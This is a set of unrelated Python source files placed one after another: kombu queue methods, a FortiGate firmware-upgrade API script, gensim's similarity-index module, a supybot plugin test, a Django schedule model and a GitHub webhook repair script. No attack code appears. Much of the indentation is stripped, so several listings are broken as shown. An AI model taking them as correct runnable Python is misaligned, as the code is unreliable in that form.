"""Start a queue consumer.
Consumers last as long as the channel they were created on, or
until the client cancels them.
:keyword consumer_tag: Unique identifier for the consumer. The
consumer tag is local to a connection, so two clients
can use the same consumer tags. If this field is empty
the server will generate a unique tag.
        :keyword no_ack: If set, received messages do not have to be
            acknowledged.
:keyword nowait: Do not wait for a reply.
:keyword callback: callback called for each delivered message
"""
return self.channel.basic_consume(queue=self.name,
no_ack=no_ack,
consumer_tag=consumer_tag or '',
callback=callback,
nowait=nowait)
def cancel(self, consumer_tag):
"""Cancel a consumer by consumer tag."""
return self.channel.basic_cancel(consumer_tag)
def delete(self, if_unused=False, if_empty=False, nowait=False):
"""Delete the queue.
:keyword if_unused: If set, the server will only delete the queue
if it has no consumers. A channel error will be raised
if the queue has consumers.
:keyword if_empty: If set, the server will only delete the queue
            if it is empty. If it's not empty a channel error will be raised.
:keyword nowait: Do not wait for a reply.
"""
return _SYN(self.channel.queue_delete, queue=self.name,
if_unused=if_unused,
if_empty=if_empty,
nowait=nowait)
def unbind(self):
"""Delete the binding on the server."""
return _SYN(self.channel.queue_unbind, queue=self.name,
exchange=self.exchange.name,
routing_key=self.routing_key,
arguments=self.binding_arguments)
def __eq__(self, other):
if isinstance(other, Queue):
return (self.name == other.name and
self.exchange == other.exchange and
self.routing_key == other.routing_key and
self.queue_arguments == other.queue_arguments and
self.binding_arguments == other.binding_arguments and
self.durable == other.durable and
self.exclusive == other.exclusive and
self.auto_delete == other.auto_delete)
return False
def __repr__(self):
return super(Queue, self).__repr__(
"Queue %s -> %s -> %s" % (self.name,
self.exchange,
self.routing_key))
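# --- Illustrative usage sketch (added for clarity; not part of the original module). ---
# `channel` is assumed to come from an established kombu connection; the exchange,
# queue and routing key names are hypothetical.
def _entity_usage_sketch(channel):
    """Declare a direct exchange plus a bound queue and publish one message."""
    media_exchange = Exchange("media", type="direct", durable=True, channel=channel)
    video_queue = Queue("video", exchange=media_exchange, routing_key="video",
                        channel=channel)
    video_queue.declare()                       # declares exchange, queue and binding
    message = media_exchange.Message("hello world", delivery_mode="persistent")
    media_exchange.publish(message, routing_key="video")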
|
#!/usr/bin/env python3
'''
Upgrade firmware image on this device using uploaded file.
Method
https://<DEVICE_IP>/api/v2/monitor/system/firmware/upgrade/
CLI
NA
Debug
FG # diag debug ena
FG # d de app httpsd -1
[httpsd 181 - 1535636630 info] ap_invoke_handler[593] -- new request (handler='api_monitor_v2-handler', uri='/api/v2/monitor/system/firmware/upgrade', method='POST')
[httpsd 181 - 1535636630 info] ap_invoke_handler[597] -- User-Agent: python-requests/2.19.1
[httpsd 181 - 1535636630 info] ap_invoke_handler[600] -- Source: 172.30.248.57:53110 Destination: 192.168.0.1:443
[httpsd 181 - 1535636630 info] endpoint_handle_req[594] -- received api_monitor_v2_request from '172.30.248.57'
[httpsd 181 - 1535636630 info] aps_init_process_vdom[1163] -- initialized process vdom to 'root' (cookie='(null)')
[httpsd 181 - 1535636630 info] api_store_parameter[227] -- add API parameter 'source': '"fortiguard"' (type=string)
[httpsd 181 - 1535636630 info] api_store_parameter[227] -- add API parameter 'filename': '"06000000FIMG0012000000"' (type=string)
[httpsd 181 - 1535636630 info] endpoint_process_req_vdom[444] -- new API request (action='upgrade',path='system',name='firmware',vdom='root',user='admin')
[httpsd 181 - 1535636630 info] system_firmware_upgrade[1635] -- firmware upgrade attempt from management station for image '06000000FIMG0012000000'
[httpsd 181 - 1535636643 info] _system_firmware_download_fds[1549] -- firmware download state: 0
[httpsd 181 - 1535636643 info] system_firmware_upgrade[1648] -- upgrade attempt for '/tmp/fdsm.out'
[httpsd 181 - 1535636643 error] system_firmware_upgrade[1652] -- upgrade initiated for '/tmp/fdsm.out'
[httpsd 181 - 1535636643 info] system_firmware_upgrade[1659] -- upgrade success for '/tmp/fdsm.out'
[httpsd 181 - 1535636643 info] ap_invoke_handler[616] -- request completed (handler='api_monitor_v2-handler' result==0)
'''
import os
import json
from fortiosapi import FortiOSAPI
FG = FortiOSAPI()
# Source host and credentials from environment variables
FG_HOST = os.environ['FG_HOST']
FG_USER = os.environ['FG_USER']
FG_PASS = os.environ['FG_PASS']
DEVICE = {
'host': FG_HOST,
'username': FG_USER,
'password': FG_PASS,
}
FG.login(**DEVICE)
# Obtain FIRMWARE_ID with monitor_system_firmware
FIRMWARE_ID = '06000000FIMG0012000000' # 6.0.0
# FIRMWARE_ID = '06000000FIMG0012000001' # 6.0.1
UPLOAD_DATA = {
'source': 'fortiguard',
'filename': FIRMWARE_ID,
}
UPLOAD_DATA = json.dumps(UPLOAD_DATA)
FG.upload('system', 'firmware/upgrade', data=UPLOAD_DATA)
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Copyright (C) 2013 Radim Rehurek <[email protected]>
# Licensed under the GNU LGPL v2.1 - http://www.gnu.org/licenses/lgpl.html
"""
This module contains functions and classes for computing similarities across
a collection of documents in the Vector Space Model.
The main class is `Similarity`, which builds an index for a given set of documents.
Once the index is built, you can perform efficient queries like "Tell me how similar
is this query document to each document in the index?". The result is a vector
of numbers as large as the size of the initial set of documents, that is, one float
for each index document. Alternatively, you can also request only the top-N most
similar index documents to the query.
You can later add new documents to the index via `Similarity.add_documents()`.
How It Works
------------
The `Similarity` class splits the index into several smaller sub-indexes ("shards"),
which are disk-based. If your entire index fits in memory (~hundreds of thousands
documents for 1GB of RAM), you can also use the `MatrixSimilarity` or `SparseMatrixSimilarity`
classes directly. These are more simple but do not scale as well (they keep the
entire index in RAM, no sharding).
Once the index has been initialized, you can query for document similarity simply by:
>>> index = Similarity('/tmp/tst', corpus, num_features=12) # build the index
>>> similarities = index[query] # get similarities between the query and all index documents
If you have more query documents, you can submit them all at once, in a batch:
>>> for similarities in index[batch_of_documents]: # the batch is simply an iterable of documents (=gensim corpus)
>>> ...
The benefit of this batch (aka "chunked") querying is much better performance.
To see the speed-up on your machine, run ``python -m gensim.test.simspeed``
(compare to my results `here <http://groups.google.com/group/gensim/msg/4f6f171a869e4fca?>`_).
There is also a special syntax for when you need similarity of documents in the index
to the index itself (i.e. queries=indexed documents themselves). This special syntax
uses the faster, batch queries internally and **is ideal for all-vs-all pairwise similarities**:
>>> for similarities in index: # yield similarities of the 1st indexed document, then 2nd...
>>> ...
"""
import logging
import itertools
import os
import heapq
import numpy
import scipy.sparse
from gensim import interfaces, utils, matutils
from six.moves import map as imap, xrange, zip as izip
logger = logging.getLogger(__name__)
PARALLEL_SHARDS = False
try:
import multiprocessing
# by default, don't parallelize queries. uncomment the following line if you want that.
# PARALLEL_SHARDS = multiprocessing.cpu_count() # use #parallel processes = #CPus
except ImportError:
pass
class Shard(utils.SaveLoad):
"""
A proxy class that represents a single shard instance within a Similarity
index.
Basically just wraps (Sparse)MatrixSimilarity so that it mmaps from disk on
request (query).
"""
def __init__(self, fname, index):
self.dirname, self.fname = os.path.split(fname)
self.length = len(index)
self.cls = index.__class__
logger.info("saving index shard to %s", self.fullname())
index.save(self.fullname())
self.index = self.get_index()
def fullname(self):
return os.path.join(self.dirname, self.fname)
def __len__(self):
return self.length
def __getstate__(self):
result = self.__dict__.copy()
# (S)MS objects must be loaded via load() because of mmap (simple pickle.load won't do)
if 'index' in result:
del result['index']
return result
def __str__(self):
return ("%s Shard(%i documents in %s)" % (self.cls.__name__, len(self), self.fullname()))
def get_index(self):
if not hasattr(self, 'index'):
logger.debug("mmaping index from %s", self.fullname())
self.index = self.cls.load(self.fullname(), mmap='r')
return self.index
def get_document_id(self, pos):
"""Return index vector at position `pos`.
        The vector is of the same type as the underlying index (i.e., dense for
        MatrixSimilarity and scipy.sparse for SparseMatrixSimilarity).
"""
assert 0 <= pos < len(self), "requested position out of range"
return self.get_index().index[pos]
def __getitem__(self, query):
index = self.get_index()
try:
index.num_best = self.num_best
index.normalize = self.normalize
        except AttributeError:
raise ValueError("num_best and normalize have to be set before querying a proxy Shard object")
return index[query]
def query_shard(args):
query, shard = args # simulate starmap (not part of multiprocessing in older Pythons)
logger.debug("querying shard %s num_best=%s in process %s", shard, shard.num_best, os.getpid())
result = shard[query]
logger.debug("finished querying shard %s in process %s", shard, os.getpid())
return result
class Similarity(interfaces.SimilarityABC):
"""
Compute cosine similarity of a dynamic query against a static corpus of documents
("the index").
Scalability is achieved by sharding the index into smaller pieces, each of which
fits into core memory (see the `(Sparse)MatrixSimilarity` classes in this module).
The shards themselves are simply stored as files to disk and mmap'ed back as needed.
"""
def __init__(self, output_prefix, corpus, num_features, num_best=None, chunksize=256, shardsize=32768):
"""
Construct the index from `corpus`. The index can be later extended by calling
the `add_documents` method. **Note**: documents are split (internally, transparently)
into shards of `shardsize` documents each, converted to a matrix, for faster BLAS calls.
Each shard is stored to disk under `output_prefix.shard_number` (=you need write
access to that location). If you don't specify an output prefix, a random
filename in temp will be used.
`shardsize` should be chosen so that a `shardsize x chunksize` matrix of floats
fits comfortably into main memory.
`num_features` is the number of features in the `corpus` (e.g. size of the
dictionary, or the number of latent topics for latent semantic models).
If `num_best` is left unspecified, similarity queries will return a full
vector with one float for every document in the index:
>>> index = Similarity('/path/to/index', corpus, num_features=400) # if corpus has 7 documents...
>>> index[query] # ... then result will have 7 floats
[0.0, 0.0, 0.2, 0.13, 0.8, 0.0, 0.1]
If `num_best` is set, queries return only the `num_best` most similar documents,
always leaving out documents for which the similarity is 0.
If the input vector itself only has features with zero values (=the sparse
representation is empty), the returned list will always be empty.
>>> index.num_best = 3
>>> index[query] # return at most "num_best" of `(index_of_document, similarity)` tuples
[(4, 0.8), (2, 0.13), (3, 0.13)]
You can also override `num_best` dynamically, simply by setting e.g.
`self.num_best = 10` before doing a query.
"""
if output_prefix is None:
# undocumented feature: set output_prefix=None to create the server in temp
self.output_prefix = utils.randfname(prefix='simserver')
else:
self.output_prefix = output_prefix
logger.info("starting similarity index under %s", self.output_prefix)
self.num_features = num_features
self.num_best = num_best
self.normalize = True
self.chunksize = int(chunksize)
self.shardsize = shardsize
self.shards = []
self.fresh_docs, self.fresh_nnz = [], 0
if corpus is not None:
self.add_documents(corpus)
def __len__(self):
return len(self.fresh_docs) + sum([len(shard) for shard in self.shards])
def __str__(self):
return ("Similarity index with %i documents in %i shards (stored under %s)" %
(len(self), len(self.shards), self.output_prefix))
def add_documents(self, corpus):
"""
Extend the index with new documents.
Internally, documents are buffered and then spilled to disk when there's
`self.shardsize` of them (or when a query is issued).
"""
min_ratio = 1.0 # 0.5 to only reopen shards that are <50% complete
if self.shards and len(self.shards[-1]) < min_ratio * self.shardsize:
            # The last shard was incomplete; load it back and add the documents there, don't start a new shard
self.reopen_shard()
for doc in corpus:
if isinstance(doc, numpy.ndarray):
doclen = len(doc)
elif scipy.sparse.issparse(doc):
doclen = doc.nnz
else:
doclen = len(doc)
if doclen < 0.3 * self.num_features:
doc = matutils.unitvec(matutils.corpus2csc([doc], self.num_features).T)
else:
doc = matutils.unitvec(matutils.sparse2full(doc, self.num_features))
self.fresh_docs.append(doc)
self.fresh_nnz += doclen
if len(self.fresh_docs) >= self.shardsize:
self.close_shard()
if len(self.fresh_docs) % 10000 == 0:
logger.info("PROGRESS: fresh_shard size=%i", len(self.fresh_docs))
def shardid2filename(self, shardid):
if self.output_prefix.endswith('.'):
return "%s%s" % (self.output_prefix, shardid)
else:
return "%s.%s" % (self.output_prefix, shardid)
def close_shard(self):
"""
Force the latest shard to close (be converted to a matrix and stored
to disk). Do nothing if no new documents added since last call.
**NOTE**: the shard is closed even if it is not full yet (its size is smaller
than `self.shardsize`). If documents are added later via `add_documents()`,
this incomplete shard will be loaded again and completed.
"""
if not self.fresh_docs:
return
shardid = len(self.shards)
# consider the shard sparse if its density is < 30%
issparse = 0.3 > 1.0 * self.fresh_nnz / (len(self.fresh_docs) * self.num_features)
if issparse:
index = SparseMatrixSimilarity(self.fresh_docs, num_terms=self.num_features,
num_docs=len(self.fresh_docs), num_nnz=self.fresh_nnz)
else:
index = MatrixSimilarity(self.fresh_docs, num_features=self.num_features)
logger.info("creating %s shard #%s", 'sparse' if issparse else 'dense', shardid)
shard = Shard(self.shardid2filename(shardid), index)
shard.num_best = self.num_best
shard.num_nnz = self.fresh_nnz
self.shards.append(shard)
self.fresh_docs, self.fresh_nnz = [], 0
def reopen_shard(self):
assert self.shards
if self.fresh_docs:
raise ValueError("cannot reopen a shard with fresh documents in index")
last_shard = self.shards[-1]
last_index = last_shard.get_index()
logger.info("reopening an incomplete shard of %i documents", len(last_shard))
self.fresh_docs = list(last_index.index)
self.fresh_nnz = last_shard.num_nnz
del self.shards[-1] # remove the shard from index, *but its file on disk is not deleted*
logger.debug("reopen complete")
def query_shards(self, query):
"""
Return the result of applying shard[query] for each shard in self.shards,
as a sequence.
If PARALLEL_SHARDS is set, the shards are queried in parallel, using
the multiprocessing module.
"""
        args = list(zip([query] * len(self.shards), self.shards))
if PARALLEL_SHARDS and PARALLEL_SHARDS > 1:
logger.debug("spawning %i query processes", PARALLEL_SHARDS)
pool = multiprocessing.Pool(PARALLEL_SHARDS)
            result = pool.imap(query_shard, args, chunksize=1 + len(args) // PARALLEL_SHARDS)
else:
# serial processing, one shard after another
pool = None
result = imap(query_shard, args)
return pool, result
def __getitem__(self, query):
"""Get similarities of document `query` to all documents in the corpus.
**or**
If `query` is a corpus (iterable of documents), return a matrix of similarities
of all query documents vs. all corpus document. This batch query is more
efficient than computing the similarities one document after another.
"""
self.close_shard() # no-op if no documents added to index since last query
# reset num_best and normalize parameters, in case they were changed dynamically
for shard in self.shards:
shard.num_best = self.num_best
shard.normalize = self.normalize
# there are 4 distinct code paths, depending on whether input `query` is
# a corpus (or numpy/scipy matrix) or a single document, and whether the
# similarity result should be a full array or only num_best most similar
# documents.
pool, shard_results = self.query_shards(query)
if self.num_best is None:
# user asked for all documents => just stack the sub-results into a single matrix
# (works for both corpus / single doc query)
result = numpy.hstack(shard_results)
else:
# the following uses a lot of lazy evaluation and (optionally) parallel
# processing, to improve query latency and minimize memory footprint.
offsets = numpy.cumsum([0] + [len(shard) for shard in self.shards])
convert = lambda doc, shard_no: [(doc_index + offsets[shard_no], sim)
for doc_index, sim in doc]
is_corpus, query = utils.is_corpus(query)
is_corpus = is_corpus or hasattr(query, 'ndim') and query.ndim > 1 and query.shape[0] > 1
if not is_corpus:
# user asked for num_best most similar and query is a single doc
results = (convert(result, shard_no) for shard_no, result in enumerate(shard_results))
result = heapq.nlargest(self.num_best, itertools.chain(*results), key=lambda item: item[1])
else:
# the trickiest combination: returning num_best results when query was a corpus
results = []
for shard_no, result in enumerate(shard_results):
shard_result = [convert(doc, shard_no) for doc in result]
results.append(shard_result)
result = []
for parts in izip(*results):
merged = heapq.nlargest(self.num_best, itertools.chain(*parts), key=lambda item: item[1])
result.append(merged)
if pool:
# gc doesn't seem to collect the Pools, eventually leading to
# "IOError 24: too many open files". so let's terminate it manually.
pool.terminate()
return result
def vector_by_id(self, docpos):
"""
Return indexed vector corresponding to the document at position `docpos`.
"""
self.close_shard() # no-op if no documents added to index since last query
pos = 0
for shard in self.shards:
pos += len(shard)
if docpos < pos:
break
if not self.shards or docpos < 0 or docpos >= pos:
raise ValueError("invalid document position: %s (must be 0 <= x < %s)" %
(docpos, len(self)))
result = shard.get_document_id(docpos - pos + len(shard))
return result
def similarity_by_id(self, docpos):
"""
Return similarity of the given document only. `docpos` is the position
of the query document within index.
"""
query = self.vector_by_id(docpos)
norm, self.normalize = self.normalize, False
result = self[query]
self.normalize = norm
return result
def __iter__(self):
"""
For each index document, compute cosine similarity against all other
documents in the index and yield the result.
"""
# turn off query normalization (vectors in the index are already normalized, save some CPU)
norm, self.normalize = self.normalize, False
for chunk in self.iter_chunks():
if chunk.shape[0] > 1:
for sim in self[chunk]:
yield sim
else:
yield self[chunk]
self.normalize = norm # restore normalization
def iter_chunks(self, chunksize=None):
"""
Iteratively yield the index as chunks of documents, each of size <= chunksize.
The chunk is returned in its raw form (matrix or sparse matrix slice).
The size of the chunk may be smaller than requested; it is up to the caller
to check the result for real length, using `chunk.shape[0]`.
"""
self.close_shard()
if chunksize is None:
# if not explicitly specified, use the chunksize from the constructor
chunksize = self.chunksize
for shard in self.shards:
query = shard.get_index().index
for chunk_start in xrange(0, query.shape[0], chunksize):
# scipy.sparse doesn't allow slicing beyond real size of the matrix
# (unlike numpy). so, clip the end of the chunk explicitly to make
# scipy.sparse happy
chunk_end = min(query.shape[0], chunk_start + chunksize)
chunk = query[chunk_start: chunk_end] # create a view
yield chunk
def check_moved(self):
"""
Update shard locations, in case the server directory has moved on filesystem.
"""
dirname = os.path.dirname(self.output_prefix)
for shard in self.shards:
shard.dirname = dirname
def save(self, fname=None, *args, **kwargs):
"""
Save the object via pickling (also see load) under filename specified in
the constructor.
Calls `close_shard` internally to spill any unfinished shards to disk first.
"""
self.close_shard()
if fname is None:
fname = self.output_prefix
super(Similarity, self).save(fname, *args, **kwargs)
def destroy(self):
"""
Delete all files under self.output_prefix. Object is not usable after calling
this method anymore. Use with care!
"""
import glob
for fname in glob.glob(self.output_prefix + '*'):
logger.info("deleting %s", fname)
os.remove(fname)
#endclass Similarity
class MatrixSimilarity(interfaces.SimilarityABC):
"""
Compute similarity against a corpus of documents by storing the index matrix
in memory. The similarity measure used is cosine between two vectors.
Use this if your input corpus contains dense vectors (such as documents in LSI
space) and fits into RAM.
The matrix is internally stored as a *dense* numpy array. Unless the entire matrix
fits into main memory, use `Similarity` instead.
See also `Similarity` and `SparseMatrixSimilarity` in this module.
"""
def __init__(self, corpus, num_best=None, dtype=numpy.float32, num_features=None, chunksize=256, corpus_len=None):
"""
`num_features` is the number of features in the corpus (will be determined
automatically by scanning the corpus if not specified). See `Similarity`
class for description of the other parameters.
"""
if num_features is None:
logger.warning("scanning corpus to determine the number of features (consider setting `num_features` explicitly)")
num_features = 1 + utils.get_max_id(corpus)
self.num_features = num_features
self.num_best = num_best
self.normalize = True
self.chunksize = chunksize
if corpus_len is None:
corpus_len = len(corpus)
if corpus is not None:
if self.num_features <= 0:
raise ValueError("cannot index a corpus with zero features (you must specify either `num_features` or a non-empty corpus in the constructor)")
logger.info("creating matrix with %i documents and %i features", corpus_len, num_features)
self.index = numpy.empty(shape=(corpus_len, num_features), dtype=dtype)
# iterate over corpus, populating the numpy index matrix with (normalized)
# document vectors
for docno, vector in enumerate(corpus):
if docno % 1000 == 0:
logger.debug("PROGRESS: at document #%i/%i", docno, corpus_len)
# individual documents in fact may be in numpy.scipy.sparse format as well.
                # it's not documented because it's not fully supported throughout.
# the user better know what he's doing (no normalization, must
# explicitly supply num_features etc).
if isinstance(vector, numpy.ndarray):
pass
elif scipy.sparse.issparse(vector):
vector = vector.toarray().flatten()
else:
vector = matutils.unitvec(matutils.sparse2full(vector, num_features))
self.index[docno] = vector
def __len__(self):
return self.index.shape[0]
def get_similarities(self, query):
"""
Return similarity of sparse vector `query` to all documents in the corpus,
as a numpy array.
If `query` is a collection of documents, return a 2D array of similarities
of each document in `query` to all documents in the corpus (=batch query,
faster than processing each document in turn).
**Do not use this function directly; use the self[query] syntax instead.**
"""
is_corpus, query = utils.is_corpus(query)
if is_corpus:
query = numpy.asarray(
[matutils.sparse2full(vec, self.num_features) for vec in query],
dtype=self.index.dtype)
else:
if scipy.sparse.issparse(query):
query = query.toarray() # convert sparse to dense
elif isinstance(query, numpy.ndarray):
pass
else:
# default case: query is a single vector in sparse gensim format
query = matutils.sparse2full(query, self.num_features)
query = numpy.asarray(query, dtype=self.index.dtype)
# do a little transposition dance to stop numpy from making a copy of
# self.index internally in numpy.dot (very slow).
result = numpy.dot(self.index, query.T).T # return #queries x #index
return result # XXX: removed casting the result from array to list; does anyone care?
def __str__(self):
return "%s<%i docs, %i features>" % (self.__class__.__name__, len(self), self.index.shape[1])
#endclass MatrixSimilarity
class SparseMatrixSimilarity(interfaces.SimilarityABC):
"""
Compute similarity against a corpus of documents by storing the sparse index
matrix in memory. The similarity measure used is cosine between two vectors.
Use this if your input corpus contains sparse vectors (such as documents in
bag-of-words format) and fits into RAM.
The matrix is internally stored as a `scipy.sparse.csr` matrix. Unless the entire
matrix fits into main memory, use `Similarity` instead.
See also `Similarity` and `MatrixSimilarity` in this module.
"""
def __init__(self, corpus, num_features=None, num_terms=None, num_docs=None, num_nnz=None,
num_best=None, chunksize=500, dtype=numpy.float32):
self.num_best = num_best
self.normalize = True
self.chunksize = chunksize
if corpus is not None:
logger.info("creating sparse index")
# iterate over input corpus, populating the sparse index matrix
try:
# use the more efficient corpus generation version, if the input
# `corpus` is MmCorpus-like (knows its shape and number of non-zeroes).
num_terms, num_docs, num_nnz = corpus.num_terms, corpus.num_docs, corpus.num_nnz
logger.debug("using efficient sparse index creation")
except AttributeError:
# no MmCorpus, use the slower version (or maybe user supplied the
# num_* params in constructor)
pass
if num_features is not None:
# num_terms is just an alias for num_features, for compatibility with MatrixSimilarity
num_terms = num_features
if num_terms is None:
raise ValueError("refusing to guess the number of sparse features: specify num_features explicitly")
corpus = (matutils.scipy2sparse(v) if scipy.sparse.issparse(v) else
(matutils.full2sparse(v) if isinstance(v, numpy.ndarray) else
matutils.unitvec(v)) for v in corpus)
self.index = matutils.corpus2csc(
corpus, num_terms=num_terms, num_docs=num_docs, num_nnz=num_nnz,
dtype=dtype, printprogress=10000).T
# convert to Compressed Sparse Row for efficient row slicing and multiplications
self.index = self.index.tocsr() # currently no-op, CSC.T is already CSR
logger.info("created %r", self.index)
def __len__(self):
return self.index.shape[0]
def get_similarities(self, query):
"""
Return similarity of sparse vector `query` to all documents in the corpus,
as a numpy array.
If `query` is a collection of documents, return a 2D array of similarities
of each document in `query` to all documents in the corpus (=batch query,
faster than processing each document in turn).
**Do not use this function directly; use the self[query] syntax instead.**
"""
is_corpus, query = utils.is_corpus(query)
if is_corpus:
query = matutils.corpus2csc(query, self.index.shape[1], dtype=self.index.dtype)
else:
if scipy.sparse.issparse(query):
query = query.T # convert documents=rows to documents=columns
elif isinstance(query, numpy.ndarray):
if query.ndim == 1:
query.shape = (1, len(query))
query = scipy.sparse.csr_matrix(query, dtype=self.index.dtype).T
else:
# default case: query is a single vector, in sparse gensim format
query = matutils.corpus2csc([query], self.index.shape[1], dtype=self.index.dtype)
# compute cosine similarity against every other document in the collection
result = self.index * query.tocsc() # N x T * T x C = N x C
if result.shape[1] == 1 and not is_corpus:
# for queries of one document, return a 1d array
result = result.toarray().flatten()
else:
# otherwise, return a 2d matrix (#queries x #index)
result = result.toarray().T
return result
#endclass SparseMatrixSimilarity
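# --- Illustrative usage sketch (added for clarity; not part of the original module). ---
# Builds a tiny in-memory sparse index over a toy bag-of-words corpus and queries it.
# The toy documents are illustrative assumptions.
def _sparse_similarity_usage_sketch():
    """Index three tiny documents and return their cosine similarity to a query."""
    from gensim import corpora
    texts = [["human", "machine", "interface"],
             ["graph", "trees"],
             ["graph", "minors", "trees"]]
    dictionary = corpora.Dictionary(texts)
    corpus = [dictionary.doc2bow(text) for text in texts]
    index = SparseMatrixSimilarity(corpus, num_features=len(dictionary))
    query = dictionary.doc2bow(["graph", "trees"])
    return index[query]  # numpy array with one similarity per indexed document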
|
###
# Copyright (c) 2005, Daniel DiPaolo
# Copyright (c) 2010, James McCoy
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice,
# this list of conditions, and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions, and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# * Neither the name of the author of this software nor the name of
# contributors to this software may be used to endorse or promote products
# derived from this software without specific prior written consent.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
###
from supybot.test import *
class AnonymousTestCase(ChannelPluginTestCase):
plugins = ('Anonymous',)
def testSay(self):
self.assertError('anonymous say %s I love you!' % self.channel)
self.assertError('anonymous say %s I love you!' % self.nick)
origreg = conf.supybot.plugins.Anonymous.requireRegistration()
origpriv = conf.supybot.plugins.Anonymous.allowPrivateTarget()
try:
conf.supybot.plugins.Anonymous.requireRegistration.setValue(False)
m = self.assertNotError('anonymous say %s foo!' % self.channel)
self.failUnless(m.args[1] == 'foo!')
conf.supybot.plugins.Anonymous.allowPrivateTarget.setValue(True)
m = self.assertNotError('anonymous say %s foo!' % self.nick)
self.failUnless(m.args[1] == 'foo!')
finally:
conf.supybot.plugins.Anonymous.requireRegistration.setValue(origreg)
conf.supybot.plugins.Anonymous.allowPrivateTarget.setValue(origpriv)
def testAction(self):
m = self.assertError('anonymous do %s loves you!' % self.channel)
try:
orig = conf.supybot.plugins.Anonymous.requireRegistration()
conf.supybot.plugins.Anonymous.requireRegistration.setValue(False)
m = self.assertNotError('anonymous do %s loves you!'%self.channel)
self.assertEqual(m.args, ircmsgs.action(self.channel,
'loves you!').args)
finally:
conf.supybot.plugins.Anonymous.requireRegistration.setValue(orig)
# vim:set shiftwidth=4 softtabstop=4 expandtab textwidth=79:
|
# -*- coding: utf-8 -*-
from django.db import models
from calendario import Calendario
from coordinador import Coordinador
class Horario(models.Model):
hora_desde = models.TimeField('desde', null=False)
hora_hasta = models.TimeField('hasta', null=False)
dia_semana = models.IntegerField(default=0, null=False)
penalizado = models.IntegerField(default=0)
movible = models.BooleanField(default=True)
calendario = models.ForeignKey(Calendario)
coordinador = models.ForeignKey(Coordinador, null=True)
def __str__(self, ):
return str(self.coordinador.especialidad)
def __eq__(self, o):
return self.hora_desde == o.hora_desde and\
self.dia_semana == o.dia_semana
    def __ne__(self, o):
        # negation of __eq__: differ in either weekday or start time
        return self.dia_semana != o.dia_semana or\
            self.hora_desde != o.hora_desde
def __lt__(self, o):
if self.dia_semana == o.dia_semana:
return self.hora_desde < o.hora_desde
return self.dia_semana < o.dia_semana
def __le__(self, o):
if self.dia_semana == o.dia_semana:
return self.hora_desde <= o.hora_desde
return self.dia_semana <= o.dia_semana
def __gt__(self, o):
if self.dia_semana == o.dia_semana:
return self.hora_desde > o.hora_desde
return self.dia_semana > o.dia_semana
def __ge__(self, o):
if self.dia_semana == o.dia_semana:
return self.hora_desde >= o.hora_desde
return self.dia_semana >= o.dia_semana
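# --- Illustrative usage sketch (added for clarity; not part of the original module). ---
# The rich comparison methods above order Horario rows by (dia_semana, hora_desde),
# so a queryset can be sorted in Python with the built-in sorted(); the filter
# below is hypothetical.
def _sorted_horarios(calendario):
    """Return the calendar's time slots sorted by weekday, then by start time."""
    return sorted(Horario.objects.filter(calendario=calendario))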
|
import logging
import os
import sys
import urlparse
from modularodm import Q
from framework.mongo import database
from framework.transactions.context import TokuTransaction
from website import settings
from website.app import init_app
from website.models import User, Node
from website.oauth.models import ExternalAccount
from website.addons.github.api import GitHubClient
from website.addons.github import settings as github_settings
from website.addons.github.utils import make_hook_secret
from website.addons.github.exceptions import GitHubError, ApiError
from scripts import utils as script_utils
logger = logging.getLogger(__name__)
PROVIDER = 'github'
PROVIDER_NAME = 'GitHub'
HOOK_DOMAIN = github_settings.HOOK_DOMAIN or settings.DOMAIN
# set of {ExternalAccount._id: (user_settings, oauth_settings)} mappings
# with invalid credentials, for logging purposes
invalid_oauth_creds = {}
# set of (node_settings[_'id'], external_account._id) tuples without a
# hook_secret, whether they were repairable or not. for logging purposes
settings_need_repair = []
def verify_user_and_oauth_settings_documents(user_document, oauth_document):
try:
assert('_id' in user_document)
assert('oauth_settings' in user_document)
assert('deleted' in user_document)
assert('owner' in user_document)
assert('_id' in oauth_document)
assert('github_user_id' in oauth_document)
assert('github_user_name' in oauth_document)
assert('oauth_access_token' in oauth_document)
assert(user_document.get('owner', None))
assert(user_document['oauth_settings'] == oauth_document['github_user_id'])
except AssertionError:
return False
else:
return True
def verify_node_settings_document(document, account):
try:
assert('_id' in document)
assert('deleted' in document)
assert('repo' in document)
assert('user' in document)
assert('registration_data' in document)
assert('owner' in document)
assert(document.get('owner', None))
assert('user_settings' in document)
except AssertionError:
return False
try:
assert('hook_id' in document)
assert('hook_secret' in document)
except AssertionError:
settings_need_repair.append((document['_id'], account._id))
logger.info(
'Making GH API request attempting to repair node settings<_id: {}> with ExternalAccount<_id: {}>'.format(document['_id'], account._id)
)
add_hook_to_old_node_settings(document, account)
return True
def add_hook_to_old_node_settings(document, account):
connect = GitHubClient(external_account=account)
secret = make_hook_secret()
hook = None
try:
hook = connect.add_hook(
document['user'], document['repo'],
'web',
{
'url': urlparse.urljoin(
HOOK_DOMAIN,
os.path.join(
Node.load(document['owner']).api_url, 'github', 'hook/'
)
),
'content_type': github_settings.HOOK_CONTENT_TYPE,
'secret': secret,
},
events=github_settings.HOOK_EVENTS,
)
except ApiError:
pass
if hook:
database['addongithubnodesettings'].find_and_modify(
{'_id': document['_id']},
{
'$set': {
'hook_id': hook.id,
'hook_secret': secret
}
}
)
